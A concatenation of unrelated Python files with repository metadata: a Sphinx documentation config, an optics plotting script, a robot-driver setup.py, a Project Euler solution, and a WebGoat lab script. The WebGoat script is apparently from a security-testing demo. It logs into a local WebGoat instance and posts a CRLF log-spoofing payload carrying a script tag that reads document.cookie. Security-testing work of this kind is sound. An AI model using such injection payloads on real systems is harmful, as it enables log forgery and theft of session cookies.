#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'python-loadersdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'python-loaders.tex', u'python-loaders Documentation',
u'Oskari Hiltunen', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'python-loaders', u'python-loaders Documentation',
[u'Oskari Hiltunen'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'python-loaders', u'python-loaders Documentation',
u'Oskari Hiltunen', 'python-loaders', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| FelixLoether/python-loaders | docs/conf.py | Python | mit | 7,808 |
from aod_visualisation import AodVisualisation
from vector_utils import normalise
import expt_data as d
import matplotlib.pyplot as plt
import numpy as np
from matplotlib import rcParams
rcParams.update({'lines.linewidth': 3})
rcParams.update({'font.size': 20})
rcParams['svg.fonttype'] = 'none' # No text as paths. Assume font installed.
rcParams['font.serif'] = ['Times New Roman']
rcParams['font.sans-serif'] = ['Arial']
rcParams['font.family'] = 'sans-serif'
av_wide = AodVisualisation(785e-9, ac_dir_rel=[1,0,0], is_wide=True, deg_bnds=(0,4))
av_narrow = AodVisualisation(785e-9, ac_dir_rel=normalise([1,0,0]), is_wide=False, deg_bnds=(-2,6))
av_narrow_800 = AodVisualisation(800e-9, ac_dir_rel=normalise([1,0,0]), is_wide=False, deg_bnds=(-1,6))
av_narrow_909 = AodVisualisation(909e-9, ac_dir_rel=normalise([1,0,0]), is_wide=False, deg_bnds=(-1,6))
av_wide_800 = AodVisualisation(800e-9, ac_dir_rel=normalise([1,0,0]), is_wide=True, deg_bnds=(-1,6))
av_wide_909 = AodVisualisation(909e-9, ac_dir_rel=normalise([1,0,0]), is_wide=True, deg_bnds=(-1,6))
def plot_eff_pwr_wide():
plt.plot(d.power, d.eff_power_wide, 'o')
av_wide.plot_efficiency_power()
def plot_eff_pwr_narrow():
plt.plot(d.power, d.eff_power_narrow, 'o')
av_narrow.plot_efficiency_power()
def plot_eff_freq_wide():
plt.plot(d.freq_wide, d.eff_freq_wide, 'o')
av_wide.plot_efficiency_freq_max()
def plot_eff_freq_narrow():
plt.plot(d.freq_narrow, d.eff_freq_narrow, 'o')
av_narrow.plot_efficiency_freq_max()
def plot_eff_ang_wide():
av_wide.plot_efficiency_xangle(ac_power=1.5)
plt.plot(d.angle_wide_again, d.eff_angle_wide_again, 'ro', markersize=12)
plt.xticks([0,2,4])
plt.yticks([0,0.5,1])
def plot_eff_ang_narrow():
av_narrow.plot_efficiency_xangle(ac_power=1.5)
plt.plot(d.angle_narrow_again, d.eff_angle_narrow_again, 'ro', markersize=12)
plt.xticks([-2,2,6])
plt.yticks([0,0.5,1])
def plot_eff_freq_narrow_expt_model():
plt.plot(d.freq_narrow_new, d.eff_freq_narrow_909_1, 'bo', markersize=8)
plt.plot(d.freq_narrow_new, d.eff_freq_narrow_800_1, 'go', markersize=8)
plt.plot(d.freq_narrow_new, d.eff_freq_narrow_909_2, 'ro', markersize=8)
plt.plot(d.freq_narrow_new, d.eff_freq_narrow_800_23, 'co', markersize=8)
av_narrow_909.plot_efficiency_freq_max()
av_narrow_800.plot_efficiency_freq_max()
av_narrow_909.plot_efficiency_freq_max_second_order()
av_narrow_800.plot_efficiency_freq_max_second_order()
plot_narrow_transducer_eff()
label_list = ['909nm -1 mode expt', '800nm -1 mode expt', '909nm -2 mode expt', '800nm -2 mode expt', \
'909nm -1 mode model', '800nm -1 mode model', '909nm -2 mode model', '800nm -2 mode model', \
'RF to acoustic inferred', 'RF to acoustic spline']
plt.legend(label_list, loc=0, borderaxespad=1.6, fontsize=16)
def plot_eff_freq_wide_expt_model():
av_wide_909.plot_efficiency_freq_max()
av_wide_800.plot_efficiency_freq_max()
av_wide_909.plot_efficiency_freq_max_second_order()
av_wide_800.plot_efficiency_freq_max_second_order()
plt.plot(d.freq_wide_new, d.eff_freq_wide_909_1, 'bo', markersize=12)
plt.plot(d.freq_wide_new, d.eff_freq_wide_800_1, 'go', markersize=12)
plt.plot(d.freq_wide_new, d.eff_freq_wide_909_2, 'ro', markersize=12)
plt.plot(d.freq_wide_new, d.eff_freq_wide_800_2, 'co', markersize=12)
plot_wide_transducer_eff()
label_list = ['909nm -1 mode expt', '800nm -1 mode expt', '909nm -2 mode expt', '800nm -2 mode expt', \
'909nm -1 mode model', '800nm -1 mode model', '909nm -2 mode model', '800nm -2 mode model', \
'RF to acoustic inferred', 'RF to acoustic spline']
plt.legend(label_list, loc=0, borderaxespad=1.6, fontsize=16)
def plot_wide_transducer_eff():
from aol_model.set_up_utils import transducer_efficiency_wide
f = np.linspace(20, 50, 300) * 1e6
plt.plot(d.freq_wide_new, transducer_efficiency_wide(np.array(d.freq_wide_new)*1e6), 'mo')
plt.plot(f/1e6, transducer_efficiency_wide(f))
def plot_narrow_transducer_eff():
from aol_model.set_up_utils import transducer_efficiency_narrow
f = np.linspace(20, 50, 300) * 1e6
plt.plot(d.freq_narrow_new, transducer_efficiency_narrow(np.array(d.freq_narrow_new)*1e6), 'mo', markersize=8)
plt.plot(f/1e6, transducer_efficiency_narrow(f))
def plot_transducer_eff():
plot_narrow_transducer_eff()
plot_wide_transducer_eff()
plt.plot(d.freq_narrow_new, d.fwd_ref_eff_narrow, marker='o')
plt.plot(d.freq_wide_new, d.fwd_ref_eff_wide, marker='o')
if __name__ == '__main__':
#plot_transducer_eff()
#plt.figure()
#plot_eff_freq_narrow_expt_model()
#plt.figure()
#plot_eff_freq_wide_expt_model()
#plt.figure()
#plot_eff_freq_narrow()
#plt.figure()
#plot_eff_freq_wide()
#plt.figure()
plot_eff_ang_wide()
#plt.figure()
plot_eff_ang_narrow()
#plt.figure()
#plot_eff_pwr_narrow()
#plt.figure()
#plot_eff_pwr_wide()
| GeoffEvans/aol_model | aol_model/aod_model_expt_comparison.py | Python | gpl-3.0 | 5,046 |
"""
"""
import argparse
import re
import json
import sys
import requests
url1 = 'http://127.0.0.1:8080/WebGoat/login.mvc'
url2 = 'http://127.0.0.1:8080/WebGoat/j_spring_security_check'
url3 = 'http://127.0.0.1:8080/WebGoat/'
payload1 = {'username':'webgoat','password':'webgoat'}
session = requests.Session()
first = session.get(url1)
login = session.post(url2, data=payload1)
lessonMenu = session.get('http://127.0.0.1:8080/WebGoat/service/lessonmenu.mvc')
lessons = lessonMenu.text
parsed = json.loads(lessons)
for each in parsed:
if 'Injection Flaws' in (each['name']):
for e in each['children']:
if 'Log Spoofing' in e['name']:
lessonLink = (e['link'])
payload2 = {'username':'Smith%250d%250aLogin+Succeeded+for+username%3A+admin%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E+&password=&SUBMIT=Login'}
log = session.post(url3+lessonLink, data=payload2)
if 'Login Succeeded' in log.text:
print('Attack Successful')
else:
print('Attack Failed')
| mtesauro/gauntlt-demo | examples/webgoat/vuln-13/vuln-13.py | Python | mit | 979 |
# coding=utf-8
# !/usr/bin/env python
import sys
try:
from setuptools import setup
except ImportError:
sys.stderr.write('using distutils\n')
from distutils.core import setup
with open('requirements.txt') as f:
required = f.read().splitlines()
required = [ req.split('#egg=')[1] if '#' in req else req for req in required ]
setup(
name='amber-python-drivers',
packages=[
'amberdriver',
'amberdriver.common',
'amberdriver.dummy',
'amberdriver.hokuyo',
'amberdriver.drive_to_point',
'amberdriver.drive_support',
'amberdriver.null',
'amberdriver.roboclaw',
'amberdriver.tools',
'amberdriver.tests'
],
package_dir={
'amberdriver': 'src/amberdriver',
'amberdriver.common': 'src/amberdriver/common',
'amberdriver.dummy': 'src/amberdriver/dummy',
'amberdriver.hokuyo': 'src/amberdriver/hokuyo',
'amberdriver.drive_to_point': 'src/amberdriver/drive_to_point',
'amberdriver.drive_support': 'src/amberdriver/drive_support',
'amberdriver.null': 'src/amberdriver/null',
'amberdriver.roboclaw': 'src/amberdriver/roboclaw',
'amberdriver.tools': 'src/amberdriver/tools',
'amberdriver.tests': 'src/amberdriver/tests'
},
package_data={'': [
'src/amberdriver/common/amber.ini',
'src/amberdriver/dummy/dummy.ini',
'src/amberdriver/hokuyo/hokuyo.ini',
'src/amberdriver/drive_to_point/drive_to_point.ini',
'src/amberdriver/drive_support/drive_support.ini',
'src/amberdriver/roboclaw/roboclaw.ini',
'src/amberdriver/tools/main.ini'
]},
data_files=[
('', [
'src/amberdriver/common/amber.ini',
'src/amberdriver/dummy/dummy.ini',
'src/amberdriver/hokuyo/hokuyo.ini',
'src/amberdriver/drive_to_point/drive_to_point.ini',
'src/amberdriver/drive_support/drive_support.ini',
'src/amberdriver/roboclaw/roboclaw.ini',
'src/amberdriver/tools/main.ini'
]),
],
test_suite="amberdriver.tests",
include_package_data=True,
install_requires=required,
version='1.19',
description='Amber drivers in python',
author=u'Paweł Suder',
author_email='pawel@suder.info',
url='http://project-capo.github.io/',
download_url='http://github.com/project-capo/amber-python-drivers/',
keywords=[
'amber',
'dummy',
'hokuyo',
'drive to point',
'drive support',
'roboclaw',
'panda'
],
classifiers=[
'Programming Language :: Python',
'Development Status :: 4 - Beta',
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: Other/Proprietary License',
'Operating System :: OS Independent',
],
long_description='''\
'''
)
| project-capo/amber-python-drivers | setup.py | Python | mit | 2,925 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from itertools import product
def palindrome(num):
n = str(num)
return n == n[::-1]
multiples = (
(a, b) for a, b in product(xrange(100, 1000), repeat=2) if palindrome(a*b)
)
print max(multiples, key=lambda (a, b): a*b)
| demonkit/projecteuler | pyimpl/4.py | Python | gpl-2.0 | 285 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.